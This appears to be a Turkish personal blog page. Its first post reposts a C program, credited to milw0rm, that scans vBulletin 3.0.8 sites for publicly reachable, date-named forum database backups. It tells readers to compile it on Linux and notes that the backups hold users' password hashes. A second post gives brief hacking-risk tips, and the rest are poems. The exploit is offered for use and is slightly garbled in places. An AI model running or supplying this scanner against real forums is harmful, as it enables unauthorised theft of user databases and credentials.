VBulletin backup.php Açığ
VBulletin backup.php Açığı
backup.php scriptinde çok güzel bir açık var. vertabanı yedeğini alırker şifre istemior. eğer site sahibi veya admin default adlı klasörün uzantısıyla oynamamışsa bir üye bunu tahmin edebilip indirebiliyo. bu dosyanın içindede her kullanıcının kullanıcı adı şifre hashleri ve birçok özeli var Exploit ; #include #include #include #include #include #include #include #define SERVER_PORT 80 char *getdate(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m-%d-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate2(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y-%d-%m", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate3(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d-%m-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate4(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m.%d.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate5(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y.%d.%m", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate6(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d.%m.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate7(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d%m%Y", localtime(&ttt)); // Tyn0r printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } main(int argc, char *argv[]) { char buffer[1000],host[255],path[255],dog[255],c; int sd, rc, i=0, d=0, b; struct sockaddr_in localAddr, servAddr; struct hostent *h; char *http = "Accept: */*rn" "Accept-Language: en-us,en;q=0.5rn" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn" "User-Agent: we want your backups - milw0rmrn" "Connection: closernrn"; if ( argc != 5) { printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.comn"); printf("usage: %s -h hostname/ip -p /path/ n",argv[0]); exit(0); } while ((c = getopt (argc, argv, "h
:" != EOF) switch(c) { case ’h’: strncpy(host,optarg,sizeof(host)); break; case ’p’: strncpy(path,optarg,sizeof(path)); break; } h = gethostbyname(host); if(h==NULL) { printf("Unknown Host ’%s’n",host); exit(1); } printf("Trying To Connect To [%s]n",host); while(1){ servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(SERVER_PORT); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Can Not Open The Socketn"); exit(1); } localAddr.sin_family = AF_INET; localAddr.sin_addr.s_addr = htonl(INADDR_ANY); localAddr.sin_port = htons(0); rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); if(rc<0) { printf("%d: cannot bind port TCP %un",sd,SERVER_PORT); perror("error "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("cannot connectn"); exit(1); } memset(buffer,0,sizeof(buffer)); if ( d == 0 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate(i),host,http); } else if ( d == 1 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate2(i),host,http); } else if ( d == 2 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate3(i),host,http); } else if ( d == 3 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate4(i),host,http); } else if ( d == 4 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate5(i),host,http); } else if ( d == 5 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate6(i),host,http); } else if ( d == 6 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate7(i),host,http); } rc = send(sd,buffer, strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); while(1) { rc=recv(sd,buffer,sizeof(buffer),0); if(strstr(buffer,"404" break; if(strstr(buffer,"200 OK" { if ( d == 0 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate(i)); } if ( d == 1 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate2(i)); } if ( d == 2 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate3(i)); } if ( d == 3 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate4(i)); } if ( d == 4 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate5(i)); } if ( d == 5 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate6(i)); } if ( d == 6 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate7(i)); } exit(0); } memset(buffer,0,sizeof(buffer)); } close(sd); if ( d < 6 ) { d++; } else { d=0; i++; } } } Kaynak:turkishajan.org
yukaridaki Cohttp://www.turkishajan.orgde ( C ) Linux da derleyip kullanabilirsiniz..
1/5/2009 | Kategori:
(Web Siteleri Güvenlik)
|
Yorum (
0
)
Yorum yaz!
Baglanti
Hacklenmemek için ufak Bilgiler
Hacklenmemek için ufak Bilgiler
Siteler için;
Html için;
Html sayfaların hacklenme riski yok denecek kadar azdır.Sayfada herhangi bir veri tabanı olmadığı için hack riski azdır.Ama sunuculardan yapılan mudahalelerle hacklenebilir.Nasıl mı?Serverda bazen 1000 lerce site olabilir.Bu sitelerin herhangi birine sızmak o serverda root olmak sizin de hacklenme riskiniz olduğunu gösterir.
Php için;Php de rfi denilen parametlereden oluşan açıklar vardır.Örneğin
include once dizinlerinde bulunan $ parametreler scriptte rfi nın olabileceğini gösterir.Bu da önemli bir tehtit haline gelebilir.
asp için;Asp için davs açıpı denen web klasörden erişim izni diye de bilinen açık olabilir.
sql;Sayfaya hata verdirilerek admin yetkisine kavuşmakta denilebilir.
PC CASUSLUĞUNU ENGELLEMEK;
Bazen kredi kartımızın veya bankamatiğimizdeki paraların boşaltığını görebiliriz.Neden acaba dediğiniz de bu bilgiyi okumanız yeterli.
Bir çok kredi kartı hırsızı büyük sitelerin kaynak kodlarına trojan keylogger gibi casus yazılımlar yükleyebilir.Bizlerde bu sitelere giriş yaptığımızda bize bulaşabilir.Bulaştıktan sonra herhangi bir online alıverişinizde kredi kartı bilgileriniz bu kişilerin eline geçmesine neden olabilir.
Bundan nasıl kurtuluruz.Mozilla firefox 3 sürümlerini kullanmanızı tavsiye ediyorum.Ayrıca internette bilmediğiniz güvenmediğiniz sitelerden asla alışveriş yapmayın.
Alıntı Kaynak:http://www.turkishajan.org
1/5/2009 | Kategori:
(Web Siteleri Güvenlik)
|
Yorum (
0
)
Yorum yaz!
Baglanti
CANPARÇAM
Şiirin Videosu
http://www.dailymotion.com/video/x869m1_can-parcamturan-ergun_music
CANPARÇAM
Canparçam Kar değil bembeyaz gökten gül yağsa
Sen yoksan ben avuç açmam canparçam
Yağmurlar yerine gökten bal yağsa
Sen yokken bir yudum içmem canparçam
Gizli bir keramet var dudağında
Gül açar öptüğün yerden bir anda
Yaprağa dönüşür kabuk yaramda
Sen varken yıkılmam göçmem canparçam
Ay güneş yüzünü tek bana dönse
Gökten asansörle melekler inse
Hiç şüphen olmasın sevenin bense
Senden başkasını seçmem canparçam
Müthiş bir sıcaklık var yüreğinde
Düşmeden eriyor kar yüreğinde
Ruhumu sımsıcak sar yüreğinde
Ömrümce üstümü açmam canparçam
Yıllarca şu gönlüm aşka aç kalsa
Şükrederim senden bir tel saç kalsa
Hatıra saklamak bile suç olsa
En büyük cezadan kaçmam canparçam
TURAN ERGÜN
31/1/2009 | Kategori:
Siir Video
|
Yorum (
1
)
Yorum yaz!
Baglanti
ISLAK YÜREK
ISLAK YÜREK
Dün gece dertlerimi topladım kaba taslak
Yüreğim bulutlardan gördüm ki daha ıslak
İçimde çürüyecek bu halde bırakırsak
Gölgede kurumuyor güneşe ser İstanbul
Yüreğime dikmişim gül sanıpta ayrığı
Kırmızıya boyamış dikenlerin sıyrığı
Görsün asya avrupa içimdeki bayrağı
Aleme ibret olsun köprüye ger İstanbul
Götür de sevdiğime dikenleri geri ver
Fırtına gösteriyor gelen bütün veriler
Sulara gömülmeden kahve rengi gemiler
Bana kapıyı göster şehirden sür İstanbul
Bakarsın şansım döner meçhule giden yolda
Kimbilir bahar gelir çiçeğim açar dalda
Aşkla uçan arıya petekte çıkar balda
Yakında müjdem gelir beklede gör İstanbul
Bakarsın seven çıkar benim hiç bilmediğim
Görürsün erken çıkar tahminim her dediğim
Adresimi sorarsa canımda fer dediğim
Kalmasın ayak izim, yerlere göm İstanbul
Adresimi sorarsa canımsın yar dediğim
Aramızda sır kalsın maziye göm İstanbul
TURAN ERGÜN
5/1/2009 | Kategori:
-seçme resimli şiirler-
|
Yorum (
1
)
Yorum yaz!
Baglanti
BULMACA ŞİİR
BULMACA
Söyleyin ben kimim neyin nesiyim
Hangi gazetenin ilavesiyim?
Hayatın garip müsvettesiyim
Boşluğa atılmış boynu büküğüm
Göğsünden vurulmuş bir bulmacayım
Yüreğimde dikiş tutmaz söküğüm
Solumdan sağıma paramparçayım
Yukardan aşağı yıkık döküğüm
Biri geldi çözmek için can attı
Kalemiyle can evimi kanattı
Oysa beni çözebilmek sanattı
Tepeden tırnağa parça bölüğüm
En hafif silahtı kurşun kalemi
Delik deşik etti bütün karemi
Haritaya çevirdi kalp küremi
Acıların ili, ilçesi, köyüyüm
Var mı aranızda çözmek isteyen
Buyursun sol yanımda gezmek isteyen
Alnıma beyaz yazı yazmak isteyen
Çözmeyi bilen ellerin tüyüyüm
Şunu bil ki sınavımda farklı kaide
Sonra beni uyarmadı deme de!
Bir yanlış üç doğru götürür bende
Hayat üniversitesi (YÖK)üyüm
Kimine göre ben delinin tekiyim
Kimine göre belki biraz zekiyim
Vuslat karnemde olmadı pekiyim
Ekose gömleğimde lekeyim
TURAN ERGÜN
17.12.2008
18/12/2008 | Kategori:
Resimli Siirler
|
Yorum (
3
)
Yorum yaz!
Baglanti
<<Önceki Sayfa
|1/80|Sonraki Sayfa>>
Bağlantılar
